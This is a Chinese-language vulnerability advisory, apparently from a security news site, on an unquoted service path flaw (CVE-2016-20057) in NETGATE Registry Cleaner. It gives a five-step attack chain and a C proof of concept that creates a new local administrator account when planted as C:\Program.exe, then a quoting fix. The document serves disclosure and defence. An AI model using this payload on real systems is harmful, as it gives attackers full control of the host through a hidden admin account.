CVE-2016-20057 CVSS 7.8 高危

CVE-2016-20057 NETGATE注册表清理程序权限提升漏洞

披露日期: 2026-04-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2016-20057

漏洞类型

权限提升

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NETGATE Registry Cleaner

漏洞概述

NETGATE Registry Cleaner build 16.0.205存在未引用服务路径漏洞。由于NGRegClnSrv服务路径未加引号，本地攻击者可在路径间隙处植入恶意程序。通过触发服务重启或系统重启，攻击者可利用此漏洞以LocalSystem权限执行代码，从而实现特权提升。

技术细节

该漏洞的核心在于Windows服务管理器对未加引号的服务路径的解析机制。当服务路径包含空格且未使用双引号包裹时（例如 C:\Program Files\...\service.exe），系统会从路径开头尝试执行，直到遇到空格。攻击者若能在系统目录（如C:\）创建名为Program.exe的恶意文件，当服务尝试启动时，系统会错误地加载C:\Program.exe而非目标文件。由于服务通常以LocalSystem权限运行，该恶意文件将获得最高系统权限，允许攻击者完全控制主机，包括安装后门、修改系统配置或窃取敏感数据。

攻击链分析

STEP 1

侦察

攻击者检查系统中NGRegClnSrv服务的ImagePath配置，发现路径未加引号且包含空格（如C:\Program Files\...）。

STEP 2

武器化

攻击者编写恶意代码（如添加管理员用户的程序），并将其编译为可执行文件（例如Program.exe）。

STEP 3

投递

攻击者将编译好的恶意文件放置在服务路径解析的优先位置（例如C:\Program.exe）。

STEP 4

利用

攻击者等待服务自动重启、手动触发服务重启，或诱导用户重启系统。

STEP 5

执行

Windows服务管理器启动服务时，由于路径未引用，错误执行了C:\Program.exe，导致恶意代码以LocalSystem权限运行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>
#include <stdlib.h>

/*
 * PoC for CVE-2016-20057 (Unquoted Service Path)
 * Compile: gcc poc.c -o Program.exe
 * Description: This code demonstrates the payload execution.
 * Place the compiled executable at C:\Program.exe 
 * (assuming the vulnerable service path is C:\Program Files\...)
 */

int main() {
    // Code executed with LocalSystem privileges
    system("net user PocUser P@ssw0rd /add");
    system("net localgroup administrators PocUser /add");
    return 0;
}

影响范围

NETGATE Registry Cleaner build 16.0.205

防御指南

临时缓解措施

建议立即修改受影响服务的注册表配置，在服务可执行文件路径前后添加双引号（例如将 "C:\Program Files\App\service.exe" 改为 "\"C:\Program Files\App\service.exe\""），并重启服务使配置生效。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表